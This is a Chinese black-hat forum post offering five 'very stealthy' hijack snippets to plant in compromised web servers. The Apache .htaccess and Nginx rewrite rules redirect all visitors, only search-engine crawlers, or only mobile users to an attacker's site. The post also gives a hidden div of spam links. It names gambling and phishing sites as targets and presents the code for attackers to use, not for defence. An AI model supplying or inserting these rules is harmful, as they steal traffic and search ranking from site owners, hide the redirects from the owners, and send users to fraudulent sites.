黑帽联盟

标题: 五种htaccess劫持代码（Apache专用，非常隐蔽） [打印本页]

作者: lgseo 时间: 昨天 13:35
标题: 五种htaccess劫持代码（Apache专用，非常隐蔽）

[color=var(--focus-color)]htaccess劫持，本质是利用 Apache 服务器的 .htaccess 配置文件（URL 重写功能）实现的恶意 / 违规操作，而合理使用htaccess 则是做合法的 URL 重写、域名跳转等，

htaccess劫持（也常叫 URL 劫持、域名劫持），是攻击者通过篡改网站的htaccess 文件，写入恶意重写规则，达到以下目的，
流量劫持、把访问你网站的用户偷偷跳转到攻击者的恶意网站（比如b彩、钓鱼站），
SEO 劫持、让搜索引擎抓取你网站时，解析到攻击者的内容，窃取你的网站权重，
内容劫、把你网站的特定页面（比如首页、高流量页面）重定向到其他地址，篡改用户看到的内容，
简单说：合法使用是 “自己控制自己的域名跳转”，劫持是 “别人篡改你的配置，把你的流量 / 内容偷走，

1、全站301跳转代码

2、只劫持蜘蛛（搜索引擎看到是指定网址，访客正常）代码

3、只劫持手机端代码

4、Nginx 配置劫持代码（nginx.conf/vhost 配置）

5、暗链 / 隐藏广告劫持代码（不跳转，但挂黑链降权）代码

[hide=d9999999]1、全站301跳转
RewriteEngine On
RewriteRule ^(.*)$ http://指定网址/$1 [R=301,L]

2、只劫持蜘蛛（搜索引擎看到是指定网址，访客正常）
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (baiduspider|googlebot|sogou|360spider) [NC]
RewriteRule ^(.*)$ http://指定网址/$1 [R=301,L]

3、只劫持手机端
RewriteCond %{HTTP_USER_AGENT} (android|iphone|ipad|mobile) [NC]
RewriteRule ^(.*)$ http://指定网址 [R=301,L]

4、Nginx 配置劫持（nginx.conf/vhost 配置）
if ($http_user_agent ~* (baiduspider|googlebot)) {
return 301 http://指定网址;
}

if ($http_user_agent ~* (mobile|android|iphone)) {
return 301 http://指定网址;
}

5、暗链 / 隐藏广告劫持（不跳转，但挂黑链降权）
<div style=”display:none;position:absolute;left:-9999px;top:-9999px”>
<a href=”b彩/s情/指定网址”>…</a>
</div>[/hide]

欢迎光临黑帽联盟 (https://bbs.cnblackhat.com/)